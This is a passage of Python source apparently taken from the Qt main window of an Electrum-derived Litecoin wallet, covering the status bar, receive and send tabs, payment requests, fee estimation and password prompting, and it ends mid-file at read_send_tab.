        text = _("Offline")
        icon = read_QIcon("status_disconnected.png")
    elif self.network.is_connected():
        server_height = self.network.get_server_height()
        server_lag = self.network.get_local_height() - server_height
        fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
        # Server height can be 0 after switching to a new server
        # until we get a headers subscription request response.
        # Display the synchronizing message in that case.
        if not self.wallet.up_to_date or server_height == 0:
            num_sent, num_answered = self.wallet.get_history_sync_state_details()
            text = ("{} ({}/{})"
                    .format(_("Synchronizing..."), num_answered, num_sent))
            icon = read_QIcon("status_waiting.png")
        elif server_lag > 1:
            text = _("Server is lagging ({} blocks)").format(server_lag)
            icon = read_QIcon("status_lagging%s.png"%fork_str)
        else:
            # confirmed / unconfirmed / unmatured balance components
            c, u, x = self.wallet.get_balance()
            text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
            if u:
                text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
            if x:
                text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
            # append fiat balance and price
            if self.fx.is_enabled():
                text += self.fx.get_fiat_status_text(c + u + x,
                    self.base_unit(), self.get_decimal_point()) or ''
            if not self.network.proxy:
                icon = read_QIcon("status_connected%s.png"%fork_str)
            else:
                icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
    else:
        if self.network.proxy:
            text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
        else:
            text = _("Not connected")
        icon = read_QIcon("status_disconnected.png")

    self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
    self.balance_label.setText(text)
    self.status_button.setIcon( icon )
def update_wallet(self):
    """Refresh the status bar; repaint the tabs when synced or when sync cannot progress."""
    self.update_status()
    synced = self.wallet.up_to_date
    offline = not self.network or not self.network.is_connected()
    if synced or offline:
        self.update_tabs()
def update_tabs(self, wallet=None):
    """Repaint every tab's list view; events for other wallets are ignored."""
    target = self.wallet if wallet is None else wallet
    if target != self.wallet:
        return
    self.history_model.refresh('update_tabs')
    for view in (self.request_list, self.address_list, self.utxo_list,
                 self.contact_list, self.invoice_list):
        view.update()
    self.update_completions()
def create_history_tab(self):
    """Build the History tab: model, list view, and its optional toolbar."""
    self.history_model = HistoryModel(self)
    self.history_list = hist_list = HistoryList(self, self.history_model)
    self.history_model.set_view(self.history_list)
    hist_list.searchable_list = hist_list
    toolbar = hist_list.create_toolbar(self.config)
    hist_list.show_toolbar(bool(self.config.get('show_toolbar_history', False)))
    return self.create_list_tab(hist_list, toolbar)
def show_address(self, addr):
    """Open the modal details dialog for *addr*."""
    from . import address_dialog
    dlg = address_dialog.AddressDialog(self, addr)
    dlg.exec_()
def show_transaction(self, tx, tx_desc = None):
    """Open the transaction dialog for *tx*.

    tx_desc is set only for txs created in the Send tab.
    """
    # Delegates to the module-level show_transaction helper (not recursion).
    show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
    """Build and return the Receive tab widget: request form, QR preview and request list."""
    # A 4-column grid layout. All the stretch is in the last column.
    # The exchange rate plugin adds a fiat widget in column 2
    self.receive_grid = grid = QGridLayout()
    grid.setSpacing(8)
    grid.setColumnStretch(3, 1)
    # Row 0: read-only receiving address with a copy button.
    self.receive_address_e = ButtonsLineEdit()
    self.receive_address_e.addCopyButton(self.app)
    self.receive_address_e.setReadOnly(True)
    msg = _('Litecoin address where the payment should be received. Note that each payment request uses a different Litecoin address.')
    self.receive_address_label = HelpLabel(_('Receiving address'), msg)
    self.receive_address_e.textChanged.connect(self.update_receive_qr)
    self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
    self.receive_address_e.setFocusPolicy(Qt.ClickFocus)
    grid.addWidget(self.receive_address_label, 0, 0)
    grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
    # Row 1: free-text description, mirrored into the QR/URI.
    self.receive_message_e = QLineEdit()
    grid.addWidget(QLabel(_('Description')), 1, 0)
    grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
    self.receive_message_e.textChanged.connect(self.update_receive_qr)
    # Row 2: requested amount, with an optional fiat mirror field.
    self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
    grid.addWidget(QLabel(_('Requested amount')), 2, 0)
    grid.addWidget(self.receive_amount_e, 2, 1)
    self.receive_amount_e.textChanged.connect(self.update_receive_qr)
    self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
    if not self.fx or not self.fx.is_enabled():
        self.fiat_receive_e.setVisible(False)
    grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
    self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
    # Row 3: expiration selector; a read-only label replaces the combo for saved requests.
    self.expires_combo = QComboBox()
    self.expires_combo.addItems([i[0] for i in expiration_values])
    self.expires_combo.setCurrentIndex(3)
    self.expires_combo.setFixedWidth(self.receive_amount_e.width())
    msg = ' '.join([
        _('Expiration date of your request.'),
        _('This information is seen by the recipient if you send them a signed payment request.'),
        _('Expired requests have to be deleted manually from your list, in order to free the corresponding Litecoin addresses.'),
        _('The Litecoin address never expires and will always be part of this Electrum wallet.'),
    ])
    grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
    grid.addWidget(self.expires_combo, 3, 1)
    self.expires_label = QLineEdit('')
    self.expires_label.setReadOnly(1)
    self.expires_label.setFocusPolicy(Qt.NoFocus)
    self.expires_label.hide()
    grid.addWidget(self.expires_label, 3, 1)
    # Row 4: Save / New buttons.
    self.save_request_button = QPushButton(_('Save'))
    self.save_request_button.clicked.connect(self.save_payment_request)
    self.new_request_button = QPushButton(_('New'))
    self.new_request_button.clicked.connect(self.new_payment_request)
    # QR preview; click toggles the detached QR window, hover shows a hand cursor.
    self.receive_qr = QRCodeWidget(fixedSize=200)
    self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
    self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
    self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
    self.receive_buttons = buttons = QHBoxLayout()
    buttons.addStretch(1)
    buttons.addWidget(self.save_request_button)
    buttons.addWidget(self.new_request_button)
    grid.addLayout(buttons, 4, 1, 1, 2)
    self.receive_requests_label = QLabel(_('Requests'))
    from .request_list import RequestList
    self.request_list = RequestList(self)
    # layout
    vbox_g = QVBoxLayout()
    vbox_g.addLayout(grid)
    vbox_g.addStretch()
    hbox = QHBoxLayout()
    hbox.addLayout(vbox_g)
    hbox.addWidget(self.receive_qr)
    w = QWidget()
    w.searchable_list = self.request_list
    vbox = QVBoxLayout(w)
    vbox.addLayout(hbox)
    vbox.addStretch(1)
    vbox.addWidget(self.receive_requests_label)
    vbox.addWidget(self.request_list)
    vbox.setStretchFactor(self.request_list, 1000)
    return w
def delete_payment_request(self, addr):
    """Remove the stored payment request for *addr* and reset the receive form."""
    self.wallet.remove_payment_request(addr, self.config)
    self.request_list.update()
    self.clear_receive_tab()
def get_request_URI(self, addr):
    """Build a BIP21 payment URI for the stored request at *addr*."""
    req = self.wallet.receive_requests[addr]
    message = self.wallet.labels.get(addr, '')
    amount = req['amount']
    query = {}
    creation_time = req.get('time')
    if creation_time:
        query['time'] = str(int(creation_time))
    expiry = req.get('exp')
    if expiry:
        query['exp'] = str(int(expiry))
    # A signed (BIP70-style) request also carries the signer name and signature.
    if req.get('name') and req.get('sig'):
        query['name'] = req['name']
        query['sig'] = bitcoin.base_encode(bfh(req.get('sig')), base=58)
    uri = util.create_bip21_uri(addr, amount, message, extra_query_params=query)
    return str(uri)
def sign_payment_request(self, addr):
    """Sign the payment request at *addr* with the configured alias key.

    Only acts when an alias is configured, resolved (self.alias_info) and the
    alias address belongs to this wallet; otherwise this is a silent no-op.
    """
    alias = self.config.get('alias')
    alias_privkey = None  # NOTE(review): assigned but never used in this method
    if alias and self.alias_info:
        alias_addr, alias_name, validated = self.alias_info
        if alias_addr:
            if self.wallet.is_mine(alias_addr):
                msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
                password = None
                if self.wallet.has_keystore_encryption():
                    password = self.password_dialog(msg)
                    # User cancelled the password prompt: abort without signing.
                    if not password:
                        return
                try:
                    self.wallet.sign_payment_request(addr, alias, alias_addr, password)
                except Exception as e:
                    self.show_error(repr(e))
                    return
            else:
                # Alias address is not ours: nothing we can sign with.
                return
def save_payment_request(self):
    """Persist the receive form as a payment request on the current address.

    Returns False (after showing an error) when both message and amount are
    empty; otherwise stores the request, signs it if an alias is configured,
    and refreshes the request/address lists.
    """
    addr = str(self.receive_address_e.text())
    amount = self.receive_amount_e.get_amount()
    message = self.receive_message_e.text()
    if not message and not amount:
        self.show_error(_('No message or amount'))
        return False
    # Index the (label, seconds) table directly instead of materializing a
    # throwaway list of all second-values just to pick one.
    i = self.expires_combo.currentIndex()
    expiration = expiration_values[i][1]
    req = self.wallet.make_payment_request(addr, amount, message, expiration)
    try:
        self.wallet.add_payment_request(req, self.config)
    except Exception as e:
        self.logger.exception('Error adding payment request')
        self.show_error(_('Error adding payment request') + ':\n' + repr(e))
    else:
        self.sign_payment_request(addr)
        self.save_request_button.setEnabled(False)
    finally:
        # Keep the UI in sync whether or not the request was stored.
        self.request_list.update()
        self.address_list.update()
def view_and_paste(self, title, msg, data):
    """Show *data* in a modal read-only text dialog with a copy-and-close button."""
    dialog = WindowModalDialog(self, title)
    layout = QVBoxLayout()
    caption = QLabel(msg)
    caption.setWordWrap(True)
    layout.addWidget(caption)
    text_view = ShowQRTextEdit(text=data)
    layout.addWidget(text_view)
    layout.addLayout(Buttons(CopyCloseButton(text_view.text, self.app, dialog)))
    dialog.setLayout(layout)
    dialog.exec_()
def export_payment_request(self, addr):
    """Serialize the request at *addr* as BIP70 and write it to a user-chosen file."""
    req = self.wallet.receive_requests.get(addr)
    payload = paymentrequest.serialize_request(req).SerializeToString()
    suggested_name = req['id'] + '.bip70'
    fileName = self.getSaveFileName(_("Select where to save your payment request"), suggested_name, "*.bip70")
    if not fileName:
        return
    with open(fileName, "wb+") as f:
        f.write(util.to_bytes(payload))
    self.show_message(_("Request saved successfully"))
    self.saved = True
def new_payment_request(self):
    """'New' button: point the receive form at a fresh unused address.

    When no unused address exists, derives a new one after a warning;
    refuses for non-deterministic wallets, which cannot derive addresses.
    """
    addr = self.wallet.get_unused_address()
    if addr is None:
        if not self.wallet.is_deterministic():
            msg = [
                _('No more addresses in your wallet.'),
                _('You are using a non-deterministic wallet, which cannot create new addresses.'),
                _('If you want to create new addresses, use a deterministic wallet instead.')
            ]
            self.show_message(' '.join(msg))
            return
        if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
            return
        # False: derive on the receiving (external) chain, not change.
        addr = self.wallet.create_new_address(False)
    self.set_receive_address(addr)
    self.expires_label.hide()
    self.expires_combo.show()
    self.new_request_button.setEnabled(False)
    self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
    """Point the receive form at *addr*, clearing the description and amount."""
    self.receive_address_e.setText(addr)
    self.receive_message_e.setText('')
    self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
    """Reset the receive form to the wallet's current receiving address."""
    try:
        receiving_addr = self.wallet.get_receiving_address() or ''
    except InternalAddressCorruption as e:
        # Surface the corruption, but still clear the form.
        self.show_error(str(e))
        receiving_addr = ''
    self.receive_address_e.setText(receiving_addr)
    self.receive_message_e.setText('')
    self.receive_amount_e.setAmount(None)
    self.expires_label.hide()
    self.expires_combo.show()
def toggle_qr_window(self):
    """Toggle the detached QR-code window, remembering its geometry across toggles."""
    from . import qrwindow
    if not self.qr_window:
        # First use: create the window and record where it opened.
        self.qr_window = qrwindow.QR_Window(self)
        self.qr_window.setVisible(True)
        self.qr_window_geometry = self.qr_window.geometry()
    elif not self.qr_window.isVisible():
        # Re-show at the remembered position.
        self.qr_window.setVisible(True)
        self.qr_window.setGeometry(self.qr_window_geometry)
    else:
        # Hide, remembering the current position for next time.
        self.qr_window_geometry = self.qr_window.geometry()
        self.qr_window.setVisible(False)
    self.update_receive_qr()
def show_send_tab(self):
    """Make the Send tab the active tab."""
    idx = self.tabs.indexOf(self.send_tab)
    self.tabs.setCurrentIndex(idx)
def show_receive_tab(self):
    """Make the Receive tab the active tab."""
    idx = self.tabs.indexOf(self.receive_tab)
    self.tabs.setCurrentIndex(idx)
def receive_at(self, addr):
    """Jump to the Receive tab with *addr* preloaded (no-op for invalid input)."""
    if bitcoin.is_address(addr):
        self.show_receive_tab()
        self.receive_address_e.setText(addr)
        self.new_request_button.setEnabled(True)
def update_receive_qr(self):
    """Rebuild the BIP21 URI / QR code from the receive form fields."""
    addr = str(self.receive_address_e.text())
    amount = self.receive_amount_e.get_amount()
    message = self.receive_message_e.text()
    # A request is worth saving once it has either an amount or a description.
    can_save = (amount is not None) or (message != "")
    self.save_request_button.setEnabled(can_save)
    uri = util.create_bip21_uri(addr, amount, message)
    self.receive_qr.setData(uri)
    if self.qr_window and self.qr_window.isVisible():
        self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
    """Paint the receive address red (with a warning tooltip) when it was used before."""
    addr = str(self.receive_address_e.text())
    if not self.wallet.is_used(addr):
        self.receive_address_e.setStyleSheet("")
        self.receive_address_e.setToolTip("")
        return
    self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
    self.receive_address_e.setToolTip(_("This address has already been used. "
                                        "For better privacy, do not reuse it for new payments."))
def set_feerounding_text(self, num_satoshis_added):
    """Cache the tooltip/message text describing the fee-rounding adjustment."""
    template = _('Additional {} satoshis are going to be added.')
    self.feerounding_text = template.format(num_satoshis_added)
def create_send_tab(self):
    """Build and return the Send tab widget: pay-to form, fee controls and invoice list."""
    # A 4-column grid layout. All the stretch is in the last column.
    # The exchange rate plugin adds a fiat widget in column 2
    self.send_grid = grid = QGridLayout()
    grid.setSpacing(8)
    grid.setColumnStretch(3, 1)
    from .paytoedit import PayToEdit
    self.amount_e = BTCAmountEdit(self.get_decimal_point)
    self.payto_e = PayToEdit(self)
    msg = _('Recipient of the funds.') + '\n\n'\
          + _('You may enter a Litecoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Litecoin address)')
    payto_label = HelpLabel(_('Pay to'), msg)
    grid.addWidget(payto_label, 1, 0)
    grid.addWidget(self.payto_e, 1, 1, 1, -1)
    # Contact-name autocompletion for the Pay-To field.
    completer = QCompleter()
    completer.setCaseSensitivity(False)
    self.payto_e.set_completer(completer)
    completer.setModel(self.completions)
    msg = _('Description of the transaction (not mandatory).') + '\n\n'\
          + _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
    description_label = HelpLabel(_('Description'), msg)
    grid.addWidget(description_label, 2, 0)
    self.message_e = MyLineEdit()
    grid.addWidget(self.message_e, 2, 1, 1, -1)
    # Manual coin selection ("From") list; hidden until coins are chosen.
    self.from_label = QLabel(_('From'))
    grid.addWidget(self.from_label, 3, 0)
    self.from_list = FromList(self, self.from_list_menu)
    grid.addWidget(self.from_list, 3, 1, 1, -1)
    self.set_pay_from([])
    msg = _('Amount to be sent.') + '\n\n' \
          + _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
          + _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
          + _('Keyboard shortcut: type "!" to send all your coins.')
    amount_label = HelpLabel(_('Amount'), msg)
    grid.addWidget(amount_label, 4, 0)
    grid.addWidget(self.amount_e, 4, 1)
    # Optional fiat mirror of the amount; hidden unless exchange rates are on.
    self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
    if not self.fx or not self.fx.is_enabled():
        self.fiat_send_e.setVisible(False)
    grid.addWidget(self.fiat_send_e, 4, 2)
    self.amount_e.frozen.connect(
        lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
    self.max_button = EnterButton(_("Max"), self.spend_max)
    self.max_button.setFixedWidth(self.amount_e.width())
    self.max_button.setCheckable(True)
    grid.addWidget(self.max_button, 4, 3)
    hbox = QHBoxLayout()
    hbox.addStretch(1)
    grid.addLayout(hbox, 4, 4)
    msg = _('Litecoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
          + _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
          + _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
    self.fee_e_label = HelpLabel(_('Fee'), msg)
    def fee_cb(dyn, pos, fee_rate):
        # Fee-slider callback: persist the chosen level/rate and refresh the form.
        if dyn:
            if self.config.use_mempool_fees():
                self.config.set_key('depth_level', pos, False)
            else:
                self.config.set_key('fee_level', pos, False)
        else:
            self.config.set_key('fee_per_kb', fee_rate, False)
        if fee_rate:
            fee_rate = Decimal(fee_rate)
            self.feerate_e.setAmount(quantize_feerate(fee_rate / 1000))
        else:
            self.feerate_e.setAmount(None)
        self.fee_e.setModified(False)
        self.fee_slider.activate()
        self.spend_max() if self.max_button.isChecked() else self.update_fee()
    self.fee_slider = FeeSlider(self, self.config, fee_cb)
    self.fee_slider.setFixedWidth(self.amount_e.width())
    def on_fee_or_feerate(edit_changed, editing_finished):
        # Manual edits to either fee box deactivate the slider; only one of
        # fee/feerate may stay "modified" (frozen) at a time.
        edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
        if editing_finished:
            if edit_changed.get_amount() is None:
                # This is so that when the user blanks the fee and moves on,
                # we go back to auto-calculate mode and put a fee back.
                edit_changed.setModified(False)
        else:
            # edit_changed was edited just now, so make sure we will
            # freeze the correct fee setting (this)
            edit_other.setModified(False)
        self.fee_slider.deactivate()
        self.update_fee()
    class TxSizeLabel(QLabel):
        # Read-only label showing the estimated tx size between feerate and fee.
        def setAmount(self, byte_size):
            self.setText(('x %s bytes =' % byte_size) if byte_size else '')
    self.size_e = TxSizeLabel()
    self.size_e.setAlignment(Qt.AlignCenter)
    self.size_e.setAmount(0)
    self.size_e.setFixedWidth(self.amount_e.width())
    self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
    self.feerate_e = FeerateEdit(lambda: 0)
    self.feerate_e.setAmount(self.config.fee_per_byte())
    self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
    self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
    self.fee_e = BTCAmountEdit(self.get_decimal_point)
    self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
    self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))
    def feerounding_onclick():
        # Explain why the displayed fee may differ slightly from the actual fee.
        text = (self.feerounding_text + '\n\n' +
                _('To somewhat protect your privacy, Electrum tries to create change with similar precision to other outputs.') + ' ' +
                _('At most 100 satoshis might be lost due to this rounding.') + ' ' +
                _("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' +
                _('Also, dust is not kept as change, but added to the fee.') + '\n' +
                _('Also, when batching RBF transactions, BIP 125 imposes a lower bound on the fee.'))
        self.show_message(title=_('Fee rounding'), msg=text)
    self.feerounding_icon = QPushButton(read_QIcon('info.png'), '')
    self.feerounding_icon.setFixedWidth(round(2.2 * char_width_in_lineedit()))
    self.feerounding_icon.setFlat(True)
    self.feerounding_icon.clicked.connect(feerounding_onclick)
    self.feerounding_icon.setVisible(False)
    self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
    vbox_feelabel = QVBoxLayout()
    vbox_feelabel.addWidget(self.fee_e_label)
    vbox_feelabel.addStretch(1)
    grid.addLayout(vbox_feelabel, 5, 0)
    # Advanced fee controls (feerate / size / fee); hidden unless 'show_fee' is set.
    self.fee_adv_controls = QWidget()
    hbox = QHBoxLayout(self.fee_adv_controls)
    hbox.setContentsMargins(0, 0, 0, 0)
    hbox.addWidget(self.feerate_e)
    hbox.addWidget(self.size_e)
    hbox.addWidget(self.fee_e)
    hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
    hbox.addStretch(1)
    vbox_feecontrol = QVBoxLayout()
    vbox_feecontrol.addWidget(self.fee_adv_controls)
    vbox_feecontrol.addWidget(self.fee_slider)
    grid.addLayout(vbox_feecontrol, 5, 1, 1, -1)
    if not self.config.get('show_fee', False):
        self.fee_adv_controls.setVisible(False)
    self.preview_button = EnterButton(_("Preview"), self.do_preview)
    self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
    self.send_button = EnterButton(_("Send"), self.do_send)
    self.clear_button = EnterButton(_("Clear"), self.do_clear)
    buttons = QHBoxLayout()
    buttons.addStretch(1)
    buttons.addWidget(self.clear_button)
    buttons.addWidget(self.preview_button)
    buttons.addWidget(self.send_button)
    grid.addLayout(buttons, 6, 1, 1, 3)
    self.amount_e.shortcut.connect(self.spend_max)
    self.payto_e.textChanged.connect(self.update_fee)
    self.amount_e.textEdited.connect(self.update_fee)
    def reset_max(text):
        # Any manual amount edit cancels "Max" mode.
        self.max_button.setChecked(False)
        enable = not bool(text) and not self.amount_e.isReadOnly()
        self.max_button.setEnabled(enable)
    self.amount_e.textEdited.connect(reset_max)
    self.fiat_send_e.textEdited.connect(reset_max)
    def entry_changed():
        # Recolor amount/fee/feerate fields: red = not enough funds,
        # blue = auto-filled value, default = user-entered value.
        text = ""
        amt_color = ColorScheme.DEFAULT
        fee_color = ColorScheme.DEFAULT
        feerate_color = ColorScheme.DEFAULT
        if self.not_enough_funds:
            amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
            feerate_color = ColorScheme.RED
            text = _("Not enough funds")
            c, u, x = self.wallet.get_frozen_balance()
            if c+u+x:
                text += " ({} {} {})".format(
                    self.format_amount(c + u + x).strip(), self.base_unit(), _("are frozen")
                )
        # blue color denotes auto-filled values
        elif self.fee_e.isModified():
            feerate_color = ColorScheme.BLUE
        elif self.feerate_e.isModified():
            fee_color = ColorScheme.BLUE
        elif self.amount_e.isModified():
            fee_color = ColorScheme.BLUE
            feerate_color = ColorScheme.BLUE
        else:
            amt_color = ColorScheme.BLUE
            fee_color = ColorScheme.BLUE
            feerate_color = ColorScheme.BLUE
        self.statusBar().showMessage(text)
        self.amount_e.setStyleSheet(amt_color.as_stylesheet())
        self.fee_e.setStyleSheet(fee_color.as_stylesheet())
        self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
    self.amount_e.textChanged.connect(entry_changed)
    self.fee_e.textChanged.connect(entry_changed)
    self.feerate_e.textChanged.connect(entry_changed)
    self.invoices_label = QLabel(_('Invoices'))
    from .invoice_list import InvoiceList
    self.invoice_list = InvoiceList(self)
    # layout
    vbox0 = QVBoxLayout()
    vbox0.addLayout(grid)
    hbox = QHBoxLayout()
    hbox.addLayout(vbox0)
    w = QWidget()
    vbox = QVBoxLayout(w)
    vbox.addLayout(hbox)
    vbox.addStretch(1)
    vbox.addWidget(self.invoices_label)
    vbox.addWidget(self.invoice_list)
    vbox.setStretchFactor(self.invoice_list, 1000)
    w.searchable_list = self.invoice_list
    run_hook('create_send_tab', grid)
    return w
def spend_max(self):
    """'Max' button handler: recompute the form to spend the full spendable balance."""
    if run_hook('abort_send', self):  # plugins may veto sending
        return
    self.max_button.setChecked(True)
    self.do_update_fee()
def update_fee(self):
    """Request a deferred fee recalculation.

    Sets a flag that is polled elsewhere — presumably a GUI timer that then
    calls do_update_fee(); confirm against the main-loop code.
    """
    self.require_fee_update = True
def get_payto_or_dummy(self):
    """Return the Pay-To recipient, or a dummy wallet address for fee estimation."""
    recipient = self.payto_e.get_recipient()
    return recipient if recipient else (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
    '''Recalculate the fee. If the fee was manually input, retain it, but
    still build the TX to see if there are enough funds.
    '''
    freeze_fee = self.is_send_fee_frozen()
    freeze_feerate = self.is_send_feerate_frozen()
    # '!' is the sentinel for "spend max" understood by make_unsigned_transaction.
    amount = '!' if self.max_button.isChecked() else self.amount_e.get_amount()
    if amount is None:
        # Empty amount: clear auto-filled fee and any error state.
        if not freeze_fee:
            self.fee_e.setAmount(None)
        self.not_enough_funds = False
        self.statusBar().showMessage('')
        return
    outputs, fee_estimator, tx_desc, coins = self.read_send_tab()
    if not outputs:
        # No recipient yet: estimate against a dummy output of the right size.
        _type, addr = self.get_payto_or_dummy()
        outputs = [TxOutput(_type, addr, amount)]
    is_sweep = bool(self.tx_external_keypairs)
    make_tx = lambda fee_est: \
        self.wallet.make_unsigned_transaction(
            coins, outputs, self.config,
            fixed_fee=fee_est, is_sweep=is_sweep)
    try:
        tx = make_tx(fee_estimator)
        self.not_enough_funds = False
    except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
        if not freeze_fee:
            self.fee_e.setAmount(None)
        if not freeze_feerate:
            self.feerate_e.setAmount(None)
        self.feerounding_icon.setVisible(False)
        if isinstance(e, NotEnoughFunds):
            self.not_enough_funds = True
        elif isinstance(e, NoDynamicFeeEstimates):
            # No fee estimate available: still try to show the tx size.
            try:
                tx = make_tx(0)
                size = tx.estimated_size()
                self.size_e.setAmount(size)
            except BaseException:
                pass
        return
    except BaseException:
        self.logger.exception('')
        return
    size = tx.estimated_size()
    self.size_e.setAmount(size)
    fee = tx.get_fee()
    fee = None if self.not_enough_funds else fee
    # Displayed fee/fee_rate values are set according to user input.
    # Due to rounding or dropping dust in CoinChooser,
    # actual fees often differ somewhat.
    if freeze_feerate or self.fee_slider.is_active():
        # Feerate drives the display; derive the absolute fee from it.
        displayed_feerate = self.feerate_e.get_amount()
        if displayed_feerate is not None:
            displayed_feerate = quantize_feerate(displayed_feerate)
        else:
            # fallback to actual fee
            displayed_feerate = quantize_feerate(fee / size) if fee is not None else None
            self.feerate_e.setAmount(displayed_feerate)
        displayed_fee = round(displayed_feerate * size) if displayed_feerate is not None else None
        self.fee_e.setAmount(displayed_fee)
    else:
        # Absolute fee drives the display; derive the feerate from it.
        if freeze_fee:
            displayed_fee = self.fee_e.get_amount()
        else:
            # fallback to actual fee if nothing is frozen
            displayed_fee = fee
            self.fee_e.setAmount(displayed_fee)
        displayed_fee = displayed_fee if displayed_fee else 0
        displayed_feerate = quantize_feerate(displayed_fee / size) if displayed_fee is not None else None
        self.feerate_e.setAmount(displayed_feerate)
    # show/hide fee rounding icon
    feerounding = (fee - displayed_fee) if fee else 0
    self.set_feerounding_text(int(feerounding))
    self.feerounding_icon.setToolTip(self.feerounding_text)
    self.feerounding_icon.setVisible(abs(feerounding) >= 1)
    if self.max_button.isChecked():
        # In Max mode the amount is an output of the fee computation, net of
        # any plugin-imposed extra fee.
        amount = tx.output_value()
        __, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
        amount_after_all_fees = amount - x_fee_amount
        self.amount_e.setAmount(amount_after_all_fees)
def from_list_delete(self, item):
    """Remove *item* from the manual coin selection and recompute the fee."""
    idx = self.from_list.indexOfTopLevelItem(item)
    self.pay_from.pop(idx)
    self.redraw_from_list()
    self.update_fee()
def from_list_menu(self, position):
    """Context menu for the coin-selection list, offering item removal."""
    item = self.from_list.itemAt(position)
    context_menu = QMenu()
    context_menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
    context_menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
    """Replace the manual coin selection with *coins* and repaint the list."""
    self.pay_from = list(coins)
    self.redraw_from_list()
def redraw_from_list(self):
    """Repaint the 'From' coin list; hide it entirely when no coins are selected."""
    self.from_list.clear()
    nothing_selected = len(self.pay_from) == 0
    self.from_label.setHidden(nothing_selected)
    self.from_list.setHidden(nothing_selected)
    def describe(coin):
        h = coin.get('prevout_hash')
        return h[0:10] + '...' + h[-10:] + ":%d"%coin.get('prevout_n') + u'\t' + "%s"%coin.get('address')
    for coin in self.pay_from:
        row = QTreeWidgetItem([describe(coin), self.format_amount(coin['value'])])
        self.from_list.addTopLevelItem(row)
def get_contact_payto(self, key):
    """Return a Pay-To string for contact *key*: 'label <address>' for address contacts."""
    _type, label = self.contacts.get(key)
    if _type == 'address':
        return label + ' <' + key + '>'
    return key
def update_completions(self):
    """Refresh the Pay-To autocompletion entries from the contact list."""
    entries = list(map(self.get_contact_payto, self.contacts.keys()))
    self.completions.setStringList(entries)
# Decorator (defined in the class body, hence no `self` on the outer function).
def protected(func):
    '''Password request wrapper. The password is passed to the function
    as the 'password' named argument. "None" indicates either an
    unencrypted wallet, or the user cancelled the password request.
    An empty input is passed as the empty string.'''
    def request_password(self, *args, **kwargs):
        parent = self.top_level_window()
        password = None
        # Loop until a valid password is entered or the user cancels.
        while self.wallet.has_keystore_encryption():
            password = self.password_dialog(parent=parent)
            if password is None:
                # User cancelled password input
                return
            try:
                self.wallet.check_password(password)
                break
            except Exception as e:
                self.show_error(str(e), parent=parent)
                continue
        kwargs['password'] = password
        return func(self, *args, **kwargs)
    return request_password
def is_send_fee_frozen(self):
    """Truthy when the user has manually pinned an absolute fee in the fee box."""
    fee_edit = self.fee_e
    return fee_edit.isVisible() and fee_edit.isModified() \
        and (fee_edit.text() or fee_edit.hasFocus())
def is_send_feerate_frozen(self):
    """Truthy when the user has manually pinned a fee rate in the feerate box."""
    rate_edit = self.feerate_e
    return rate_edit.isVisible() and rate_edit.isModified() \
        and (rate_edit.text() or rate_edit.hasFocus())
def get_send_fee_estimator(self):
    """Return the frozen fee (int), a feerate-based estimator (callable), or None."""
    if self.is_send_fee_frozen():
        return self.fee_e.get_amount()
    if self.is_send_feerate_frozen():
        feerate = self.feerate_e.get_amount()  # sat/byte feerate
        feerate = 0 if feerate is None else feerate * 1000  # sat/kilobyte feerate
        return partial(
            simple_config.SimpleConfig.estimate_fee_for_feerate, feerate)
    return None
def read_send_tab(self):
